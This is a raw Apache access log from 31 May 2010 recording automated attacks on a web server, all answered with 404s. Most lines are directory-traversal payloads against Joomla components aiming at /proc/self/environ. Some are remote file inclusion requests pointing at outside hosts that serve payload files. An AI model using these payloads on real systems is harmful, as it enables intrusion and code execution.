74.55.65.134 - - [31/May/2010:05:43:28 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:43:30 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:43:30 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:43:31 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:43:37 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:43:41 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:43:57 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:43:58 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:43:58 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:44:07 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
114.108.177.125 - - [31/May/2010:05:44:24 -0500] "GET /logs/access_log.1271894400//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:05:44:24 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:05:44:25 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:05:44:47 -0500] "GET /logs/access_log.1271808000//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.186.60.116 - - [31/May/2010:05:47:45 -0500] "GET /logs/index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:05:47:46 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:05:48:13 -0500] "GET /logs/index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:05:48:14 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:05:48:20 -0500] "GET /logs/index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
213.186.60.116 - - [31/May/2010:05:48:20 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
69.175.14.66 - - [31/May/2010:05:50:54 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.175.14.66 - - [31/May/2010:05:50:54 -0500] "GET /logs/access_log.1274227200//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.14.66 - - [31/May/2010:05:50:54 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.211.114.164 - - [31/May/2010:05:52:24 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
91.211.114.164 - - [31/May/2010:05:52:24 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
209.44.120.3 - - [31/May/2010:05:52:25 -0500] "GET /logs/*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
209.44.120.3 - - [31/May/2010:05:52:25 -0500] "GET /*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
209.44.120.3 - - [31/May/2010:05:52:29 -0500] "GET /logs/*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
209.44.120.3 - - [31/May/2010:05:52:29 -0500] "GET /*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.50.85.15 - - [31/May/2010:05:53:13 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
74.50.85.15 - - [31/May/2010:05:53:13 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.50.85.15 - - [31/May/2010:05:53:13 -0500] "GET /logs/access_log.1271548800//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
94.102.1.206 - - [31/May/2010:05:53:21 -0500] "GET /logs/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:05:53:21 -0500] "GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.110.147.156 - - [31/May/2010:05:53:28 -0500] "GET /logs/*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.813"
89.110.147.156 - - [31/May/2010:05:53:28 -0500] "GET /*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
94.136.60.168 - - [31/May/2010:05:53:37 -0500] "GET /logs/*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
94.136.60.168 - - [31/May/2010:05:53:37 -0500] "GET /*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
209.44.120.3 - - [31/May/2010:05:53:43 -0500] "GET /logs/*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
209.44.120.3 - - [31/May/2010:05:53:43 -0500] "GET /*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
209.44.120.3 - - [31/May/2010:05:53:53 -0500] "GET /logs/*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
209.44.120.3 - - [31/May/2010:05:53:53 -0500] "GET /*/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
69.175.14.66 - - [31/May/2010:05:54:03 -0500] "GET /logs/access_log.1273363200%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.55.146.140 - - [31/May/2010:05:54:11 -0500] "GET /logs/index.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:05:54:11 -0500] "GET /index.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.136.60.168 - - [31/May/2010:05:54:18 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.136.60.168 - - [31/May/2010:05:54:18 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.110.147.156 - - [31/May/2010:05:54:43 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
89.110.147.156 - - [31/May/2010:05:54:43 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
72.55.146.140 - - [31/May/2010:05:54:58 -0500] "GET /logs/*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:05:54:58 -0500] "GET /*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:05:55:01 -0500] "GET /logs/*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:05:55:01 -0500] "GET /*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
58.125.181.214 - - [31/May/2010:05:55:40 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
58.125.181.214 - - [31/May/2010:05:55:40 -0500] "GET /logs/access_log.1271548800//admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
58.125.181.214 - - [31/May/2010:05:55:41 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
64.251.10.117 - - [31/May/2010:05:55:43 -0500] "GET /logs/*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:05:55:43 -0500] "GET /*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
207.46.195.241 - - [31/May/2010:05:55:56 -0500] "GET /logs/access_log.1209081600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.251.10.117 - - [31/May/2010:05:56:05 -0500] "GET /logs/*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:05:56:05 -0500] "GET /*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
174.121.58.89 - - [31/May/2010:05:56:40 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.89 - - [31/May/2010:05:56:40 -0500] "GET //index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.58.89 - - [31/May/2010:05:56:55 -0500] "GET /logs/index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.89 - - [31/May/2010:05:56:55 -0500] "GET /index2.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
94.23.11.114 - - [31/May/2010:05:57:43 -0500] "GET /logs/*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:05:57:44 -0500] "GET /*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
200.43.180.250 - - [31/May/2010:05:58:04 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:05:58:04 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:05:58:04 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:05:58:14 -0500] "GET /logs/*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:05:58:15 -0500] "GET /*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:05:58:17 -0500] "GET /logs/*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:05:58:18 -0500] "GET /*.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:05:58:32 -0500] "GET /logs/index.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:05:58:32 -0500] "GET /index.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
122.112.32.51 - - [31/May/2010:05:59:02 -0500] "GET //uigaproxy/include/template.php?content=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:05:59:02 -0500] "GET /logs//uigaproxy/include/template.php?content=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:05:59:02 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
174.121.58.89 - - [31/May/2010:06:00:10 -0500] "GET //index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.73.80.242 - - [31/May/2010:06:00:18 -0500] "GET /logs/index.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:06:00:18 -0500] "GET /logs/index.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:06:00:18 -0500] "GET /index.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:06:00:18 -0500] "GET /index.php?option=com_hscofig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
122.112.32.51 - - [31/May/2010:06:00:39 -0500] "GET /logs/access_log.1271548800//uigaproxy/include/template.php?content=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
200.43.180.250 - - [31/May/2010:06:00:40 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:06:00:40 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:06:00:41 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
122.112.32.51 - - [31/May/2010:06:00:49 -0500] "GET /logs/access_log.1272326400//uigaproxy/include/template.php?content=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:06:00:49 -0500] "GET /logs/access_log.1272240000//uigaproxy/include/template.php?content=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 342 "-""Mozilla/5.0"
174.121.58.89 - - [31/May/2010:06:02:33 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.58.89 - - [31/May/2010:06:02:34 -0500] "GET //index.php?option=com_kochsuite&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.14.66 - - [31/May/2010:06:02:35 -0500] "GET /logs/access_log.1271548800//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.49 - - [31/May/2010:06:04:26 -0500] "GET /artwork/txt.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.90.73.48 - - [31/May/2010:06:07:05 -0500] "GET /logs/access_log.1273363200/index1.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
66.90.73.48 - - [31/May/2010:06:07:05 -0500] "GET /index1.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
66.90.73.48 - - [31/May/2010:06:07:05 -0500] "GET /logs/index1.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
174.133.106.98 - - [31/May/2010:06:07:19 -0500] "GET //tiny_includes/config.php?dir_ws=http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/id.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.834"
174.133.106.98 - - [31/May/2010:06:07:20 -0500] "GET /logs//tiny_includes/config.php?dir_ws=http://www.sosmicroparis.fr//components/com_artforms/assets/captcha/includes/captchatalk/id.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.834"
69.175.14.66 - - [31/May/2010:06:08:19 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
187.45.193.159 - - [31/May/2010:06:13:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.102.1.206 - - [31/May/2010:06:15:10 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:06:15:11 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
203.19.4.18 - - [31/May/2010:06:16:46 -0500] "GET /logs/access_log.1274227200//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.180 - - [31/May/2010:06:21:06 -0500] "GET /tattoo/tattoo-cd.htm HTTP/1.0" 200 968 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.203.115.77 - - [31/May/2010:06:21:21 -0500] "GET /logs/index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.115.77 - - [31/May/2010:06:21:21 -0500] "GET /index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.204.187 - - [31/May/2010:06:21:56 -0500] "GET /logs/access_log.1206662400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.239 - - [31/May/2010:06:24:55 -0500] "GET /logs/access_log.1183507200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
173.203.115.77 - - [31/May/2010:06:25:44 -0500] "GET /index.php?xcart_dir=http://playersinn.com/darts/idx? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.13.85 - - [31/May/2010:06:25:55 -0500] "GET /logs/access_log.1183680000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.201.191 - - [31/May/2010:06:26:44 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.55.65.134 - - [31/May/2010:06:27:14 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
91.121.201.191 - - [31/May/2010:06:30:34 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
74.55.65.134 - - [31/May/2010:06:30:52 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:30:52 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:30:52 -0500] "GET /logs//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:30:54 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:30:54 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:30:54 -0500] "GET /logs//index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:31:10 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:31:15 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:31:16 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:31:21 -0500] "GET //index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:31:37 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:31:40 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:31:40 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:31:41 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:31:44 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:06:31:47 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:31:49 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:31:49 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:32:39 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:32:39 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:33:04 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
201.36.173.93 - - [31/May/2010:06:33:11 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
66.90.73.48 - - [31/May/2010:06:33:57 -0500] "GET //cnt/user_stat.php?DDum=19&MDum=3&YDum=2010/tiny_includes/config.php?dir_ws=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
